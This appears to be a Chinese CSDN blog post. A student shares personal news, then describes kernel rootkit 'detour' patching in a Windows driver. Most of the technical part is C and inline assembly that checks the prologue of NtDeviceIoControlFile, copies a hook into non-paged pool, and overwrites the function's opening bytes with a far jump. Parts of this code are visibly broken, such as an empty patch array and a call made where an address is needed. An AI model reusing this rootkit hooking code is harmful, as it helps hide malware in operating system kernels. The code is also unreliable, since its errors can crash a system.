在一起的16天

最新推荐文章于 2016-12-17 13:02:27 发布
最新推荐文章于 2016-12-17 13:02:27 发布
阅读量379 收藏
点赞数 1
分类专栏: Rootkit 文章标签: 随笔 RootKit 打补丁
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012324979/article/details/50435895
版权

     好长时间没记录点东西了  重要的事说三遍 脱单了 脱单了 脱单了  女票当然是追了将近两年的女神。虽然有些意外  到现在还不知道她想法 总之怎么说,认真去对待,我想走到最后。

     之前由于有些兴奋,荒废了一些专业上的东西,学期接近尾声,最大的收获也算是Rootkit吧,接下来不管去不去宁 寒假都要学的 免杀,windows编程(远控),下学期逆向、linux。

    今天看了Rootkit打补丁的两种方式,1、detour补丁  2、jumptemplate补丁

    detour补丁有点类似于inlineHook(说实在的真没看出来二者区别)即当系统在调用一些函数时,将函数的开头指令部分修改为无条件跳转指令,JMP,从而在函数运行时跳转到事先编号的Rootkit函数并在Rootkit函数中实现原函数被修改的指令功能最后在跳回到原函数中运行。

实现detour补丁,首先需要判断修改的函数是否是你预想的那个系统版本,(如果修改的字节数造成原函数存在截断指令,系统将无法识别剩下的截断指令,从而造成系统蓝屏)即通过对比函数需要修改的几个指令,是否和自己预先调试的一样,如果出现截断指令需用nop将其填充。

如 NTSTATUS CheckFuctionBytesNtDeviceIoControlFile()

{

       int i=0;

       char *p=(char *)NtDeviceIoControlFile;

       char c[]={0x55,0x8B,0xEC,0x6A,0x01,0xFF,0x75,0x2c};

       while(i<8)

       {

             if(p[i]==c[i])

               {

                     i++;

               }

              else

                  return STATUS_UNSUCCESSFUL;

       }

       return STATUS_SUCCESS;


}

之后编写Rootkit函数,该函数被声明为naked属性,为了防止系统在其运行时插入其他代码。

__declspec(naked) my_function_detour_ntdeviceIoControl()

{

        //rootkit 代码

        __asm

       {

              push ebp

              mov ebp,esp

              push 0x01

              push dword ptr [ebp+0x2c]

              //jmp to the rootkit code

              _emit 0xEA

             _emit 0xAA

              _emit 0xAA

              _emit 0xAA

             _emit 0xAA

             _emit 0x08

             _emit 0x00


      }

       

}

运行时修改地址

VOID DetourFunctionNtDeviceIoControlFile()

{

          char *actualfunction=(char *)NtDeviceIoControlFile();

          char *non_paged_memory;

          unsigned long detour_address;

          unsigned long reentry_address;

          int i=0;

          char newCode[]={};

           reentry_address=((unsigned long )NtDeviceIoControlFile)+8;

          non_paged_memory=ExAllocatePool(NonPagedPool,256);

          for(i=0;i<256;i++)

          {

                ((unsigned char*)non_paged_memory[i])=((unsigned char*)my_function_detour_ntdeviceIoControl)[i];

               

          }

          detour_address=(unsigned long )non_paged_memory;

        *( (unsigned long *) (& newCode[1]))=detour_address;

          for(i=0;i<256;i++)

          {

               if((unsigned char*)non_paged_memory[i]==0xAA&&(unsigned char*)non_paged_memory[i+1]==0xAA&&(unsigned char*)non_paged_memory[i+2]==0xAA&&(unsigned char*)non_paged_memory[i+3]==0xAA)

              {

                        *((unsigned char*)non_paged_memory[i])=reentry_address;

                         break;

              }

          }

         for(i=0;i<9;i++)

         {

              actualfunction[i]=newCode[i];

         }


}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriver,IN PUNICODE_STRING pRegistryPath)

{

        if(NT_SUCCESS!=CheckFuctionBytesNtDeviceIoControlFile())

       {

               DbgPrint("unmatched function");

               return STATUS_UNSUCCESSFUL;

       }

       DetourFunctionNtDeviceIoControlFile();

        return STATUS_SUCCESS;

}




Bean灬
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算在一起的天数html,记录情侣在一起天数的软件 很火的情侣天数记录软件
weixin_35662051的博客
06-30 4176
记录情侣在一起的天数是非常有意义,而且市面上有很多为情侣设计的APP,接下来我们就来看看记录情侣在一起天数的软件以及很火的情侣天数记录软件。一、记录情侣在一起天数的软件 很火的情侣天数记录软件1、一半较新版一半手机版是一款非常有趣的拍照软件,软件主要针对情侣而设定的,你一半我一半组合成一张完整的照片!大家一起来秀恩爱!操作简单!2、情侣空间app情侣空间app是情侣之间的一款相当棒的应用。软件可以...
一起变装吧服务器维护,2020年1月16日维护预览
weixin_34319902的博客
08-05 4715
以下内容在全部服务器放出:1.吉鼠闹春,恭贺新年,本周维护后2020年春节活动将与大家见面,提前祝福大家新年快乐,身体健康,福运满满,财气冲天:1)群仙贺岁新春佳节,众位仙家为保三界平安,特与侠士一路同行,考验侠士一年来是否武艺精进;活动时间:1月16日-1月30日玩法介绍:【请神培养】①请神符获取:每日达到活跃度要求可获得请神符;每日副本通关有机会额外获得请神符;②玩家获得请神符后可召唤神仙,并...
16天记住7000考研单词
热门推荐
幸福街--linux技术分享
03-08 1万+
16天记住7000考研单词(第一天) 1. With my own ears I clearly heard the heart beat of the nuclear bomb. 我亲耳清楚地听到原子弹的心脏的跳动。 2. Next year the bearded bear will bear a dear baby in the rear. 明年,长胡子的熊将在后方产一头可爱的小崽.
16天记住7000考研单词9-16天
技术就是个纸老虎---为之,则难者亦易矣;不为,则易者亦难矣。
01-05 7443
<br /><br />16天记住7000考研单词(第九天)<br />401. The beloved novelist put her lovely gloves above the stove.<br />敬爱的小说家把她美丽的手套放在火炉上方。<br />402. It's proved that the approver improved waterproof roof.<br />经证实,赞同者改善了防水屋顶.<br />403. In the reaction, the fraction ac
16年,悲痛又收获的一年
欢迎关注公众号:【码农突围】,公号后台回复9999,可以获取一份500页的LeetCode刷题笔记。
12-17 1万+
前言:岁末,无论是公司的考核,还是其他的总结。都要如期而致,有人说,最近很忧虑,忧虑是对一切未来的不确定。打破忧虑,就是去行动。无论过去怎样,都已不重要,一切都要重新出发。记录下16年发生的大事记吧。二月花开年后坐着北上的列车,和铁哥们商量着,一边上班,一边干票事。想法至今认为都还好。那些夜里都是满脑在想着如何构思,如何定我们的战略。毕竟大家都年经,没有什么导师告诉我们,应该准备怎样,钱都准备好了。
16天记7000单词
10-08
通过16天的学习计划,该文档旨在帮助用户在短时间内掌握大量词汇,提升英语水平。 文档的核心策略可能是利用比较记忆法,这是一种科学有效的记忆技巧。比较记忆法指的是将相似或相关的单词放在一起对比学习,通过...
2013高考生物 模拟冲刺16天 7实验与探究
08-19
而鉴定还原糖时,CuSO4与NaOH反应生成的Cu(OH)2与还原糖形成砖红色沉淀,而在蛋白质鉴定中,CuSO4是与NaOH一起构成双缩脲试剂的成分。 3. 实验技术的应用:酒精在观察植物细胞有丝分裂中用于固定和脱色,而在检测...
16天背7000考研英语
03-25
"16天背7000考研英语"的主题旨在挑战自己在短时间内高效积累大量英语词汇,这对于备考者来说是一种高强度且具有挑战性的学习计划。这个计划的核心理念是通过集中精力和持续努力,尽可能快地掌握考研所需的词汇,以...
Flash动作脚本技术(FAS程序设计项目化教程--项目七--金苑五笔打字训练系统).doc
07-23
flash
毕业设计项目之基于Opencv的车牌识别系统项目源码
最新发布
07-23
毕业设计项目之基于Opencv的车牌识别系统项目源码 版本:python3.7.3,opencv4.0.0.21,numpy1.16.2,tkinter和PIL5.4.1.
MSP4305529控制AD9833(DDS模块)
07-23
采用TI单片机MSP4305529LP来控制DDS模块产生正弦信号方波信号三角波信号或正弦扫频信号
连接器连接口装配机_包括零件图_机械3D图可修改打包下载.zip
07-23
连接器连接口装配机_包括零件图_机械3D图可修改打包下载.zip
六工位组装机_包括零件图_机械3D图可修改打包下载.zip
07-23
六工位组装机_包括零件图_机械3D图可修改打包下载
time.apk.zip
07-23
time.apk.zip
如何学习嵌入式系统(基于ARM平台).doc
07-23
嵌入式
基于 django 开发的图书管理系统程序源码
07-23
基于 django 开发的图书管理系统程序源码 修改数据库配置信息 修改 bookproject.settings.py 中 DATABASES 的相关信息
开题报告车辆租赁APP 已通过开题答辩的.doc
07-23
在当今信息技术高度发达的背景下,车辆租赁交易应用程序已经成为现代城市交通管理的关键组成部分。近年来,随着移动端开发技术、地图API、导航SDK等技术的不断进步,车辆租赁APP得以提供更为智能、精准的服务。在应用领域,各种业务模式的创新和用户体验的提升不断推动着车辆租赁APP的发展。 在国内,众多知名互联网公司如滴滴出行、哈啰出行等纷纷推出了车辆租赁APP。通过先进的定位技术和便捷的移动支付系统,这些APP为用户提供了灵活、高效的出行选择。这些应用的普及不仅方便了居民的日常出行,也积极促进了城市交通资源的合理利用,缓解了交通拥堵,改善了城市空气质量。
linux-cpp-yolov8-demo.rar
07-23
linux_cpp_yolov8_demo 博客地址:https://lw112190.blog.csdn.net/article/details/140647921
如何把混在一起的股票数据分别列出来,每一行代表某一只股票某天的数据,每只股票都有一年的数据MATLAB
05-24
假设你已经将每只股票一年的数据存储在一个矩阵中,你可以使用MATLAB中的for循环来遍历每个矩阵,并将其转换为一个行向量,然后将所有的行向量按照顺序拼接在一起即可。 以下是一个示例代码: ```matlab % 假设你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值